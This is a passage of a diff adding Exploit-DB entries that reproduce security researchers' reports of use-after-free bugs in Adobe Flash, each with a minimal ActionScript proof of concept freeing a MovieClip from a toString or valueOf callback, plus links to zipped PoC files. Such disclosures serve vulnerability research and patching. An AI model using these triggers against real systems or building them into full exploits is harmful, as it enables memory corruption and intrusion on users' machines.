+There is a use-after-free in the TextField.replaceText function. If the function is called with a string parameter with toString defined, or an integer parameter with valueOf defined, the parent object of the TextField can be used after it is freed. Please note that all three parameters of this function are susceptible to this issue.
+
+A minimal PoC is as follows:
+
+var times = 0;
+var mc = this.createEmptyMovieClip("mc", 101);
+var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
+tf.replaceText( 1, 2, {valueOf : func});
+
+function func(){
+
+	mc.removeMovieClip();
+
+        // Fix heap here
+
+	return "text";
+	
+	}
+
+A sample swf and fla are attached.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39048.zip
+

platforms/windows/dos/39049.txt

@@ -0,0 +1,33 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=583
+
+If a TextField variable is set to a value with toString defined, and the TextField is updated, a use-after-free can occur if the toString method frees the TextField's parent. A minimal PoC is as follows:
+
+var mc = this.createEmptyMovieClip("mc", 301);
+var my_txt = mc.createTextField("my_txt", 302, 0, 0, 100, 100); 
+trace(my_txt);
+my_txt.variable = "today_date"; 
+mc.today_date = "blah"; 
+var times = 0;
+ 
+var date_interval:Number = setInterval(updateDate, 500);
+ 
+function updateDate() { 
+    mc.today_date = {toString : func}; 
+}
+
+function func(){
+	if(times == 0){
+		times++;
+		mc.removeMovieClip();
+	}
+
+	return "test";
+	
+	}
+
+A sample fla and swf are attached.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39049.zip
+

platforms/windows/dos/39050.txt

@@ -0,0 +1,24 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=579
+
+There is a use-after-free in the TextField.variable setter. If the variable name that is added is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows:
+
+var mc = this.createEmptyMovieClip("mc", 101);
+var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
+tf.variable = {toString : func};
+
+function func(){
+
+	mc.removeMovieClip();
+
+        // Fix heap here
+
+	return "myvar";
+	
+	}
+
+A sample swf and fla are attached.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39050.zip
+

platforms/windows/dos/39051.txt

@@ -0,0 +1,24 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=578
+
+There is a use-after-free in the TextField.htmlText setter. If the htmlText the field is set to is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows:
+
+var mc = this.createEmptyMovieClip("mc", 101);
+var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
+tf.htmlText = {toString : func};
+
+function func(){
+
+	mc.removeMovieClip();
+
+        // Fix heap here
+
+	return "<b>hello</b>";
+	
+	}
+
+A sample swf and fla are attached.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39051.zip
+

platforms/windows/dos/39052.txt

@@ -0,0 +1,24 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=577
+
+There is a use-after-free in the TextField.type setter. If the type the field is set to is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows:
+
+var mc = this.createEmptyMovieClip("mc", 101);
+var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
+tf.type = {toString : func};
+
+function func(){
+
+	mc.removeMovieClip();
+
+        // Fix heap here
+
+	return "input";
+	
+	}
+
+A sample swf and fla are attached.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39052.zip
+

platforms/windows/dos/39053.txt

@@ -0,0 +1,24 @@
+Source:  https://code.google.com/p/google-security-research/issues/detail?id=576
+
+There is a use-after-free in the TextField.text setter. If the text the field is set to is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows:
+
+var mc = this.createEmptyMovieClip("mc", 101);
+var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
+tf.text = {toString : func};
+
+function func(){
+
+	mc.removeMovieClip();
+
+        // Fix heap here
+
+	return "natalie";
+	
+	}
+
+A sample swf and fla are attached.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39053.zip
+

platforms/windows/dos/39054.txt

@@ -0,0 +1,29 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=574
+
+There is a use-after-free in the TextField.tabIndex setter. If the integer parameter is an object with valueOf defined, then it can free the TextField's parent, leading to a use-after-free. A minimal PoC follows:
+
+var times = 0;
+var mc = this.createEmptyMovieClip("mc", 1);
+var tf = mc.createTextField("tf", 2, 1, 1, 100, 100);
+tf.text = "hello";
+tf.tabIndex = {valueOf : func};
+
+function func(){
+	if(times == 0){
+		times++;
+		return;
+        }
+	mc.removeMovieClip();
+	
+        // Fix heap here
+
+	return 0x77777777;
+	
+	}
+
+A sample swf and fla are attached.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39054.zip
+

platforms/windows/dos/39055.txt

@@ -0,0 +1,24 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=571
+
+There is a use-after-free in MovieClip.attachMovie. If a string parameter has toString defined, a number parameter has valueOf defined or an object parameter has its constructor redefined, it can execute code and free the this object of the method, leading to a use-after-free.
+
+A minimal PoC is as follows:
+
+n ={valueOf : func};
+
+function func(){
+	
+	_global.mc.removeMovieClip();
+        // fix heap here;
+  	
+   }
+this.createEmptyMovieClip("mc", 1);
+_global.mc = mc;
+mc.attachMovie("myResetButton","newResetButton", n);
+
+A sample swf and fla are attached.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39055.zip
+

platforms/windows/dos/39056.txt

@@ -0,0 +1,27 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=570
+
+There is a use-after-free issue in MovieClip.localToGlobal. If the Number constructor is overwritten with a new constructor and MovieClip.localToGlobal is called with an integer parameter, the new constructor will get called. If this constructor frees the MovieClip, a use-after-free occurs. A minimal PoC is as follows:
+
+var a = func;
+_global.Number = a;
+this.createEmptyMovieClip("mc", 1);
+mc.localToGlobal( 7 );
+
+
+function func(){
+	
+	mc.removeMovieClip();
+	
+        // fix heap here  
+
+        this.x = 2;
+	this.y = 1;
+	
+	}
+	
+A sample swf and fla are attached.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39056.zip
+